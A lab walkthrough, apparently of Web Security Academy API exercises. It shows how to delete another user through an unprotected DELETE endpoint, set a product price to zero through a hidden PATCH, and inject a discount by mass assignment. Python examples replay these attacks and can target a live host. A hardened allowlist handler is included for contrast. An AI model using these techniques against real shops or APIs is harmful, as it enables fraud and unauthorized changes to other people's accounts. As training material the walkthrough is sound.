Level 1 [Easy]: Exploiting an API endpoint using documentation
Goal: delete the user carlos.
On the page for updating your own email address you can capture a PATCH request whose URI is:
/api/user/wiener
(The URI is built in the front-end JS, shown below. The username taken from the form is appended to the path, so the same request shape works for any username:)
const changeEmail = (form, e) => {
    e.preventDefault();
    const formData = new FormData(form);
    const username = formData.get('username');
    const email = formData.get('email');
    fetch(
        `${form.action}/${encodeURIComponent(username)}`, // <----------- note: the username from the form becomes the last path segment
        {
            method: 'PATCH',
            body: JSON.stringify({ 'email': email })
        }
    )
    .then(res => res.json())
    .then(handleResponse(displayErrorMessage(form)));
};
The response is:
{"username":"wiener","email":"123@123.com"}
Send an OPTIONS request to see which methods the endpoint supports; the response shows DELETE is allowed.
Send a DELETE request to /api/user/carlos (the body {"username":"carlos","email":"123@123.com"} was simply kept from the PATCH request).
Lab solved.
Level 2 [Normal]: Finding and exploiting an unused API endpoint
A strange payment bug: the goal is to get the leather jacket for $0.
There is a hidden API; changing the price with a PATCH request solves the lab.
Click the button to add the jacket to the cart and capture the request:
/api/products/1/price
Response:
{"price":"$1337.00","message":"24 people are watching this item right now"}
Send an OPTIONS request; the response says the endpoint supports:
Allow: GET, PATCH
Change the method in the request line to PATCH (PATCH /api/products/1/price HTTP/2) and send it; the response is:
{"type":"ClientError","code":400,"error":"Only 'application/json' Content-Type is supported"}
Add the header Content-Type: application/json and put an empty JSON object {} in the body; send it and the response is:
{"type":"ClientError","code":400,"error":"'price' parameter missing in body"}
Put the following in the request body:
{"price":0}
That changes the jacket's price; now just buy the jacket.
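The probe-and-escalate loop used in Level 1 and Level 2 above, as an added example (not the lab's or PortSwigger's code): discover the methods an endpoint advertises with OPTIONS, then send the state-changing method and fix the Content-Type and body until the server accepts it. The transport is injectable: FakeLab is a constructed offline stand-in that reproduces the responses quoted above, and https_transport() sends the same calls to a real host you name. The host name, FakeLab, and the function names are assumptions made for this example.

```python
"""Added example: OPTIONS discovery followed by an iterative PATCH, as in the
walkthrough.  FakeLab is a constructed stand-in, not the real lab server."""
import http.client
import json
import ssl


def https_transport(host):
    """Real transport for a lab instance (host is an assumption; fill in your own)."""
    def send(method, path, headers=None, body=None):
        conn = http.client.HTTPSConnection(host, context=ssl.create_default_context())
        conn.request(method, path, body=body, headers=headers or {})
        resp = conn.getresponse()
        return resp.status, {k.lower(): v for k, v in resp.getheaders()}, resp.read().decode()
    return send


class FakeLab:
    """Constructed stand-in for /api/products/1/price mirroring the quoted responses."""
    def __init__(self):
        self.price_cents = 133700          # "$1337.00"; matches item_price in Level 3

    @staticmethod
    def _error(code, msg):
        return code, {}, json.dumps({"type": "ClientError", "code": code, "error": msg})

    def _fmt(self):
        return "$%d.%02d" % divmod(self.price_cents, 100)

    def send(self, method, path, headers=None, body=None):
        headers = {k.lower(): v for k, v in (headers or {}).items()}
        if path != "/api/products/1/price":
            return self._error(404, "Not Found")
        if method == "OPTIONS":
            return 204, {"allow": "GET, PATCH"}, ""
        if method == "GET":
            return 200, {}, json.dumps({"price": self._fmt()})
        if method == "PATCH":
            if headers.get("content-type") != "application/json":
                return self._error(400, "Only 'application/json' Content-Type is supported")
            data = json.loads(body or "{}")
            if "price" not in data:
                return self._error(400, "'price' parameter missing in body")
            self.price_cents = int(data["price"])          # no authorization check: the bug
            return 200, {}, json.dumps({"price": self._fmt()})
        return self._error(405, "Method Not Allowed")


def allowed_methods(send, path):
    """Step shared by both labs: OPTIONS, then parse the Allow header into a set."""
    _, headers, _ = send("OPTIONS", path)
    return {m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()}


def escalate_patch(send, path, new_price_cents):
    """Replay Level 2: bare PATCH, then the JSON header, then the required field.
    Returns (error messages seen on the way, final price string)."""
    if "PATCH" not in allowed_methods(send, path):
        raise RuntimeError("endpoint does not advertise PATCH")
    errors = []
    attempts = [
        ({}, None),                                                   # bare PATCH
        ({"Content-Type": "application/json"}, "{}"),                # right type, empty body
        ({"Content-Type": "application/json"}, json.dumps({"price": new_price_cents})),
    ]
    for hdrs, body in attempts:
        status, _, text = send("PATCH", path, headers=hdrs, body=body)
        data = json.loads(text)
        if status == 200:
            return errors, data["price"]
        errors.append(data["error"])
    raise RuntimeError("PATCH never succeeded: " + "; ".join(errors))


if __name__ == "__main__":
    lab = FakeLab()        # swap for https_transport("<your-lab-host>") to run it live
    print(allowed_methods(lab.send, "/api/products/1/price"))
    print(escalate_patch(lab.send, "/api/products/1/price", 0))
```

Each server error message tells you exactly what to change next, which is why reading 400 bodies carefully is faster than guessing; the real fix on the server side is an authorization check on PATCH, not a better error message.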
Level 3 [Normal]: Exploiting a mass assignment vulnerability
This one has a hidden discount parameter; find it and you're done:
After logging in, clicking the cart button sends a GET request to /api/checkout; the response is:
{"chosen_discount":{"percentage":0},"chosen_products":[{"product_id":"1","name":"Lightweight \"l33t\" Leather Jacket","quantity":3,"item_price":133700}]}
Note the percentage parameter above: it is the discount, and the server discloses it even though the client never sends it.
Click the Place order button in the cart (the payment button) and capture the request:
{"chosen_products":[{"product_id":"1","quantity":3}]}
Add the "chosen_discount":{"percentage":0} object captured above to this request body, giving:
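The mass-assignment step from Level 3, as an added example (not the lab's or PortSwigger's code): merge the discount object the server discloses on GET into the place-order body, then show why that works by contrasting a checkout handler that binds every client field onto the order with one that only accepts an allowlist. The two handlers, the CATALOGUE price table, and the function names are constructed for this example; the two JSON documents are the ones quoted above.

```python
"""Added example: crafting a mass-assignment payload and the server-side
pattern that makes it work versus the one that stops it."""
import json

# The GET /api/checkout response quoted above (item_price is in cents).
CHECKOUT_VIEW = json.loads(
    '{"chosen_discount":{"percentage":0},"chosen_products":'
    '[{"product_id":"1","name":"Lightweight \\"l33t\\" Leather Jacket",'
    '"quantity":3,"item_price":133700}]}'
)
# The captured place-order request body quoted above.
PLACE_ORDER = json.loads('{"chosen_products":[{"product_id":"1","quantity":3}]}')
# Constructed catalogue so the handlers can price items server-side.
CATALOGUE = {"1": 133700}


def craft_order(place_order_body, checkout_view, percentage):
    """Copy the discount object the server exposes on GET into the POST body,
    with the percentage set to whatever the attacker wants."""
    crafted = json.loads(json.dumps(place_order_body))      # deep copy
    discount = dict(checkout_view["chosen_discount"])
    discount["percentage"] = percentage
    crafted["chosen_discount"] = discount
    return crafted


def vulnerable_checkout(body):
    """Binds every top-level request field onto the order (mass assignment),
    so a client-supplied chosen_discount silently replaces the server default."""
    order = {"chosen_discount": {"percentage": 0}}
    order.update(body)                                       # the bug
    return _total(order)


def hardened_checkout(body):
    """Allowlist only the fields a client may set; the discount stays server-owned."""
    order = {
        "chosen_discount": {"percentage": 0},
        "chosen_products": [
            {"product_id": str(p["product_id"]), "quantity": int(p["quantity"])}
            for p in body.get("chosen_products", [])
        ],
    }
    return _total(order)


def _total(order):
    """Total in cents after discount; prices come from the catalogue, not the client."""
    subtotal = sum(CATALOGUE[p["product_id"]] * p["quantity"] for p in order["chosen_products"])
    pct = order["chosen_discount"]["percentage"]
    if not 0 <= pct <= 100:
        raise ValueError("discount percentage out of range")
    return subtotal * (100 - pct) // 100


if __name__ == "__main__":
    body = craft_order(PLACE_ORDER, CHECKOUT_VIEW, 100)
    print(json.dumps(body))
    print("vulnerable total (cents):", vulnerable_checkout(body))
    print("hardened total (cents):  ", hardened_checkout(body))
```

The tell-tale sign during testing is a field that appears in a GET response but not in the corresponding write request: anything the server echoes back is a candidate for being bound on the way in.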